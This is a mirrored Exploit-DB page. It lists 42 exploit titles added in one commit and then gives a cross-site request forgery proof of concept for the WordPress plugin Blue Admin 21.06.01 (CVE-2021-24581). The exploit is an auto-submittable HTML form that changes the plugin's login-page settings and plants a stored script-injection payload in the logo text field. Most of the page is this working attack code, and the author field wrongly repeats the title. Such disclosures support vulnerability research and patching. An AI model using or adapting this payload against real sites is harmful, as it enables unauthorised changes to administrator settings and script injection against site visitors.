exploit-db-mirror/exploits/php/webapps/50925.html
Offensive Security be24992411 DB: 2022-05-12
42 changes to exploits/shellcodes

UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path
Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
ExifTool 12.23 - Arbitrary Code Execution
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)
Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
Akka HTTP 10.1.14 - Denial of Service
USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
Bookeen Notea - Directory Traversal
SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
DLINK DIR850 - Insecure Access Control
DLINK DIR850 - Open Redirect
Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
Tenda HG6 v3.3.0 - Remote Command Injection
Google Chrome 78.0.3904.70 - Remote Code Execution
PyScript - Read Remote Python Source Code
DLINK DAP-1620 A1 v1.01 - Directory Traversal
Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
ImpressCMS v1.4.4 - Unrestricted File Upload
Microfinance Management System 1.0 - 'customer_number' SQLi
WebTareas 2.4 - Blind SQLi (Authenticated)
WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated)
Magento eCommerce CE v2.3.5-p2 - Blind SQLi
Bitrix24 - Remote Code Execution (RCE) (Authenticated)
CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
e107 CMS v3.2.1 - Multiple Vulnerabilities
Anuko Time Tracker - SQLi (Authenticated)
TLR-2005KSH - Arbitrary File Upload
Explore CMS 1.0 - SQL Injection
Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated)
PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS)
Beehive Forum - Account Takeover
MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Joomla Plugin SexyPolling 2.1.7 - SQLi
WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
2022-05-12 05:01:39 +00:00

26 lines
No EOL
1.4 KiB
HTML

Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Date: 2021-07-27
Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Vendor Homepage : https://wpscan.com/plugin/blue-admi
Version : <= 21.06.01
Tested on: windows 10 Professional
CVE : CVE-2021-24581
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" />
<input type="hidden" name="ba_lp_attr[fm_color]" value="777777" />
<input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' />
<input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" />
<input type="hidden" name="ba_lp_attr[logo_img]" value="" />
<input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" />
<input type="hidden" name="ba_lp_attr[text_color]" value="222222" />
<input type="hidden" name="ba_lp_attr[bg_img]" value="" />
<input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" />
<input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" />
<input type="hidden" name="ba_lp_options_save" value="Save changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>